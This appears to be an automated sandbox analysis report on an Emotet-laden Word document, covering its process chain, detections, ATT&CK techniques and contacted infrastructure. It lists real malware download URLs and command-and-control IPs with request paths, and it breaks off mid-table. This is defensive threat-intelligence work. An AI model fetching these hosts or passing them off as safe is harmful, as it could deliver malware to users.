                      Source: Yara matchFile source: 0000000C.00000002.2160551478.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2102719700.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2117996445.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2114399878.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2149672448.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2169787783.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2137671003.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2193587143.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2170530219.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2184882219.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2102091974.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2339389951.0000000000250000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2160390338.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.190000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.230000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.190000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection111Masquerading21OS Credential DumpingSecurity Software Discovery11Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsCommand and Scripting Interpreter211Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsScripting32Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Process Injection111NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsPowerShell3Network Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information3LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonScripting32Cached Domain CredentialsSystem Information Discovery15VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsHidden Files and Directories1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information11Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 344615 Sample: PO# 01222021.doc Startdate: 26/01/2021 Architecture: WINDOWS Score: 100 49 Multi AV Scanner detection for domain / URL 2->49 51 Antivirus detection for URL or domain 2->51 53 Multi AV Scanner detection for dropped file 2->53 55 15 other signatures 2->55 14 cmd.exe 2->14         started        17 WINWORD.EXE 293 26 2->17         started        process3 signatures4 63 Suspicious powershell command line found 14->63 65 Very long command line found 14->65 67 Encrypted powershell cmdline option found 14->67 19 powershell.exe 12 9 14->19         started        24 msg.exe 14->24         started        process5 dnsIp6 47 cab.mykfn.com 103.143.46.51, 49165, 80 NETMAGIC-APNetmagicDatacenterMumbaiIN India 19->47 45 C:\Users\user45k2duhbbehaviorgraphxlh9ia6_R.dll, PE32 19->45 dropped 59 Powershell drops PE file 19->59 26 rundll32.exe 19->26         started        file7 signatures8 process9 process10 28 rundll32.exe 26->28         started        process11 30 rundll32.exe 2 28->30         started        signatures12 69 Hides that the sample has been downloaded from the Internet (zone.identifier) 30->69 33 rundll32.exe 30->33         started        process13 process14 35 rundll32.exe 1 33->35         started        signatures15 57 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->57 38 rundll32.exe 35->38         started        process16 process17 40 rundll32.exe 1 38->40         started        signatures18 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 40->61 43 rundll32.exe 40->43         started        process19

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      PO# 01222021.doc66%VirustotalBrowse
                      PO# 01222021.doc51%MetadefenderBrowse
                      PO# 01222021.doc68%ReversingLabsDocument-Word.Trojan.Emotet

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll100%Joe Sandbox ML
                      C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll49%MetadefenderBrowse
                      C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll86%ReversingLabsWin32.Trojan.EmotetCrypt

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      11.2.rundll32.exe.200000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.1f0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      13.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      16.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.230000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      16.2.rundll32.exe.250000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.210000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      11.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      12.2.rundll32.exe.210000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      14.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      12.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      14.2.rundll32.exe.200000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      16.2.rundll32.exe.230000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.1f0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      15.2.rundll32.exe.210000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      13.2.rundll32.exe.1d0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.190000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.210000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      11.2.rundll32.exe.1e0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      14.2.rundll32.exe.1e0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.170000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      15.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      cab.mykfn.com4%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://cab.mykfn.com/admin/X/15%VirustotalBrowse
                      http://cab.mykfn.com/admin/X/100%Avira URL Cloudmalware
                      http://gocphongthe.com/wp-content/lMMC/11%VirustotalBrowse
                      http://gocphongthe.com/wp-content/lMMC/100%Avira URL Cloudmalware
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://ie-best.net/online-timer-kvhxz/ilXL/11%VirustotalBrowse
                      http://ie-best.net/online-timer-kvhxz/ilXL/100%Avira URL Cloudmalware
                      http://www.letscompareonline.com/de.letscompareonline.com/wYd/100%Avira URL Cloudmalware
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://bhaktivrind.com/cgi-bin/JBbb8/100%Avira URL Cloudmalware
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://cab.mykfn.com100%Avira URL Cloudmalware
                      http://vanddnabhargave.com/asset/W9o/100%Avira URL Cloudmalware

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      cab.mykfn.com
                      103.143.46.51
                      truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://cab.mykfn.com/admin/X/true
                      • 15%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000006.00000002.2103112691.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102339016.0000000002067000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116873780.0000000002207000.00000002.00000001.sdmpfalse
                        high
                        http://www.windows.com/pctv.rundll32.exe, 00000009.00000002.2125315211.0000000001E80000.00000002.00000001.sdmpfalse
                          high
                          http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tpowershell.exe, 00000005.00000002.2097308660.0000000003C08000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://investor.msn.comrundll32.exe, 00000006.00000002.2102951545.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102183359.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115579456.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125315211.0000000001E80000.00000002.00000001.sdmpfalse
                            high
                            http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000006.00000002.2102951545.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102183359.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115579456.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125315211.0000000001E80000.00000002.00000001.sdmpfalse
                              high
                              http://www.icra.org/vocabulary/.rundll32.exe, 00000006.00000002.2103112691.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102339016.0000000002067000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116873780.0000000002207000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2092035965.0000000002190000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117451818.00000000028F0000.00000002.00000001.sdmpfalse
                                high
                                http://ocsp.sectigo.com0powershell.exe, 00000005.00000002.2097308660.0000000003C08000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://gocphongthe.com/wp-content/lMMC/powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmptrue
                                • 11%, Virustotal, Browse
                                • Avira URL Cloud: malware
                                unknown
                                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#powershell.exe, 00000005.00000002.2097308660.0000000003C08000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://ie-best.net/online-timer-kvhxz/ilXL/powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmptrue
                                • 11%, Virustotal, Browse
                                • Avira URL Cloud: malware
                                unknown
                                http://investor.msn.com/rundll32.exe, 00000006.00000002.2102951545.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102183359.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115579456.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125315211.0000000001E80000.00000002.00000001.sdmpfalse
                                  high
                                  http://cambiasuhistoria.growlab.es/wp-content/hGhY2/powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.letscompareonline.com/de.letscompareonline.com/wYd/powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://sectigo.com/CPS0Dpowershell.exe, 00000005.00000002.2097308660.0000000003C08000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.%s.comPApowershell.exe, 00000005.00000002.2092035965.0000000002190000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117451818.00000000028F0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    low
                                    http://bhaktivrind.com/cgi-bin/JBbb8/powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000006.00000002.2103112691.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102339016.0000000002067000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116873780.0000000002207000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.hotmail.com/oerundll32.exe, 00000006.00000002.2102951545.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102183359.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115579456.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125315211.0000000001E80000.00000002.00000001.sdmpfalse
                                      high
                                      http://cab.mykfn.compowershell.exe, 00000005.00000002.2097308660.0000000003C08000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://vanddnabhargave.com/asset/W9o/powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown

                                      Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public

                                      IPDomainCountryFlagASNASN NameMalicious
                                      195.159.28.230
                                      unknownNorway
                                      2116ASN-CATCHCOMNOtrue
                                      69.38.130.14
                                      unknownUnited States
                                      26878TWRS-NYCUStrue
                                      103.143.46.51
                                      unknownIndia
                                      17439NETMAGIC-APNetmagicDatacenterMumbaiINtrue

                                      General Information

                                      Joe Sandbox Version:31.0.0 Emerald
                                      Analysis ID:344615
                                      Start date:26.01.2021
                                      Start time:19:54:57
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 8m 18s
                                      Hypervisor based Inspection enabled:false
                                      Report type:light
                                      Sample file name:PO# 01222021.doc
                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                      Number of analysed new started processes analysed:18
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • GSI enabled (VBA)
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winDOC@28/8@1/3
                                      EGA Information:
                                      • Successful, ratio: 90.9%
                                      HDC Information:
                                      • Successful, ratio: 31.6% (good quality ratio 29.4%)
                                      • Quality average: 70.8%
                                      • Quality standard deviation: 26.8%
                                      HCA Information:
                                      • Successful, ratio: 83%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .doc
                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                      • Found warning dialog
                                      • Click Ok
                                      • Attach to Office via COM
                                      • Scroll down
                                      • Close Viewer
                                      Warnings:
                                      Show All
                                      • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                      • TCP Packets have been reduced to 100
                                      • Execution Graph export aborted for target powershell.exe, PID 1296 because it is empty
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      19:55:37API Interceptor1x Sleep call for process: msg.exe modified
                                      19:55:38API Interceptor44x Sleep call for process: powershell.exe modified
                                      19:55:53API Interceptor201x Sleep call for process: rundll32.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      195.159.28.230FP4554867134UQ.docGet hashmaliciousBrowse
                                      • 195.159.28.230:8080/1kewy5snl5u5qwd1i/2m2zjf0onqwa3jb46/txmdgqo8th3cjzzn3/e09y7w1/n16qjyb3buse6byb/1xkxxrlbgrsn7c/
                                      79a2gzs3gkk.docGet hashmaliciousBrowse
                                      • 195.159.28.230:8080/qx5bd9nftkeamx9go/tfd1n5eo46apeeemf0b/mj4150jmaay6lk5516s/fvisgp1w/jgoi7zg/0vfpwrsi4wovyhl/
                                      INFO.docGet hashmaliciousBrowse
                                      • 195.159.28.230:8080/u4vcbkerccn0qjbn6d/1p4m0oqpu4fiqr/mxqkk/
                                      DKMNT.docGet hashmaliciousBrowse
                                      • 195.159.28.230:8080/u14g/zkd6myomm2wuro5/q121fslblp4j4u7p7ny/boxgaf0or/u8p9yrywc1amf/
                                      WWB4766-012021-4480624.docGet hashmaliciousBrowse
                                      • 195.159.28.230:8080/orsnig0hr2s74h42s/s6f5l/8oomdsfuyoft/ut3wi8ze1lmdcgp5d/zu7j1c9ns/otptuv61n2r997toe/
                                      file.docGet hashmaliciousBrowse
                                      • 195.159.28.230:8080/3j8r06xre/8aflom7at/nfsdzovs6zi5xy894/pzjbw/
                                      Dokumentation_2021_M_428406.docGet hashmaliciousBrowse
                                      • 195.159.28.230:8080/n0jv/20kkdc3lp37n1r7yr9l/7fl0uh0jxz/
                                      69.38.130.14FP4554867134UQ.docGet hashmaliciousBrowse
                                        79a2gzs3gkk.docGet hashmaliciousBrowse
                                          INFO.docGet hashmaliciousBrowse
                                            DOK-012021.docGet hashmaliciousBrowse
                                              DKMNT.docGet hashmaliciousBrowse
                                                WWB4766-012021-4480624.docGet hashmaliciousBrowse
                                                  file.docGet hashmaliciousBrowse
                                                    Dokumentation_2021_M_428406.docGet hashmaliciousBrowse
                                                      103.143.46.51DOK-012021.docGet hashmaliciousBrowse
                                                      • cab.mykfn.com/admin/X/
                                                      DKMNT.docGet hashmaliciousBrowse
                                                      • cab.mykfn.com/admin/X/
                                                      WWB4766-012021-4480624.docGet hashmaliciousBrowse
                                                      • cab.mykfn.com/admin/X/
                                                      file.docGet hashmaliciousBrowse
                                                      • cab.mykfn.com/admin/X/
                                                      Dokumentation_2021_M_428406.docGet hashmaliciousBrowse
                                                      • cab.mykfn.com/admin/X/

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      cab.mykfn.comDOK-012021.docGet hashmaliciousBrowse
                                                      • 103.143.46.51
                                                      DKMNT.docGet hashmaliciousBrowse
                                                      • 103.143.46.51
                                                      WWB4766-012021-4480624.docGet hashmaliciousBrowse
                                                      • 103.143.46.51
                                                      file.docGet hashmaliciousBrowse
                                                      • 103.143.46.51
                                                      Dokumentation_2021_M_428406.docGet hashmaliciousBrowse
                                                      • 103.143.46.51

                                                      ASN

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      TWRS-NYCUSFP4554867134UQ.docGet hashmaliciousBrowse
                                                      • 69.38.130.14
                                                      79a2gzs3gkk.docGet hashmaliciousBrowse
